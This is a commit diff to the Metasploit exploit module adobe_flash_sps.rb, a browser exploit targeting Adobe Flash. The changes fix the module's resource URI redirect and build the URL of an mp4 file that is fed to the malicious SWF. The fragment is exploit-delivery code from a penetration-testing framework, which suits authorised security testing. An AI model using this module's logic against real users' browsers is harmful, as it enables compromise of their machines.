Land rapid7#1954 - Fix resource_uri and mp4 file path

wchen-r7 · wchen-r7 · commit 0d384d23b8d3 · 2013-06-14T13:15:17.000-05:00
diff --git a/modules/exploits/windows/browser/adobe_flash_sps.rb b/modules/exploits/windows/browser/adobe_flash_sps.rb
@@ -108,8 +108,8 @@ def on_request_uri(cli, request)
 		end
 
 		# Redirect to a trailing slash so relative paths work properly
-		if resource_uri != "/" and not request.uri.index("#{resource_uri}/")
-			uri = resource_uri + "/"
+		if get_resource != "/" and not request.uri.index("#{get_resource}/")
+			uri = get_resource + "/"
 			send_redirect(cli, uri)
 			return
 		end
@@ -147,7 +147,8 @@ def on_request_uri(cli, request)
 		end
 
 		myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
-		swf_uri = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf"
+		mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4"
+		swf_uri = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf" + "?autostart=true&image=video.jpg&file=#{mp4_uri}"
 
 		html = %Q|
 		<html>
